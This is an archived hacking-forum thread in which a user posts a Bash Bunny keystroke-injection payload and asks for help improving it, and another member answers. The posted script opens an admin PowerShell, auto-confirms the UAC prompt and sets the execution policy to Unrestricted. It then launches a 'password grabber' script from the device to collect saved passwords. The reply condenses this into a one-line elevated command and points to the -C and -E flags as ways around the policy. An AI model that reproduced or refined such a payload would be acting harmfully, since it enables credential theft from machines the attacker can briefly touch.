Trhd.life Posted January 15, 2019 Share Posted January 15, 2019 hello, this is my first submitted payload and was wondering if i can have any help maturing this script, if there was any way to polish up this script. the point of the script is to open an admin power shell and then unrestrict the execution policy. it came about do to the password grabber not giving be the results i needed. I start off with a ducky script to set the execution policy then go on to basically loads the password grabber ps1 Any way to make this script better Ducky Script Quote DELAY 3000 GUI d DELAY 700 GUI r DELAY 700 STRING PowerShell DELAY 700 ENTER DELAY 700 STRING Start-Process powershell -verb runAs DELAY 700 ENTER DELAY 700 ALT y DELAY 700 STRING Set-ExecutionPolicy UnRestricted DELAY 700 ENTER STRING exit DELAY 500 ENTER DELAY 500 STRING exit ENTER Payload Quote LED SETUP ATTACKMODE HID STORAGE # Check for switch position to make it easier for us. GET SWITCH_POSITION LED ATTACK if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then QUACK ${SWITCH_POSITION}/ducky_script.txt LED FINISH sleep 5 LED ATTACK RUN WIN "powerShell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')" # Wait until passwords are grabbed. sleep 10 LED FINISH else LED FAIL echo "Unable to load ducky_script.txt" >> /root/debuglog.txt exit 1 fi Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted January 16, 2019 Share Posted January 16, 2019 Hmm, when you use the -C or the -E parameter (those are short for command and encodedcommand) it is a bypass as long as any additions are sucked in as a string to be invoked. But, since you want a disabler you can combine the powershell part into one run command. GUI r DELAY 700 STRING "powershell -C \"start-process powershell -verb runas -argumentlist '-C set-executionpolicy unrestricted'\"" DELAY 700 ENTER DELAY 2000 ALT y Of course even with the policy restricted you will see the powershell command will run the C argument, in both instances when it is called. Link to comment Share on other sites More sharing options...
Trhd.life Posted January 16, 2019 Author Share Posted January 16, 2019 Update: My original script doers execute the payload but does not save anything in the loot file. I have tried the suggested edit in powershell (not being executed by bash bunny) with the fallowing resaults Quote PS C:\Users\PC> "powershell -C \"start-process powershell -verb runas -argumentlist '-C set-executionpolicy unrestricted'"" At line:1 char:18 + "powershell -C \"start-process powershell -verb runas -argumentlist ' ... + ~~~~~~~~~~~~~ Unexpected token 'start-process' in expression or statement. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : UnexpectedToken also to be clear this task is to recover my mother-in-law FB password to set up her new phone does not have to be covert i am simply using this opertunity to learn more about powershell Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted January 16, 2019 Share Posted January 16, 2019 That is because those \" are escaping the double quotes on the bash bunny so if you are doing it without the Bunny then it will look like this in the run command prompt. powershell -C "start-process powershell -verb runas -argumentlist '-C set-executionpolicy unrestricted'" If you do it from the Bunny it will look like my previous post. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.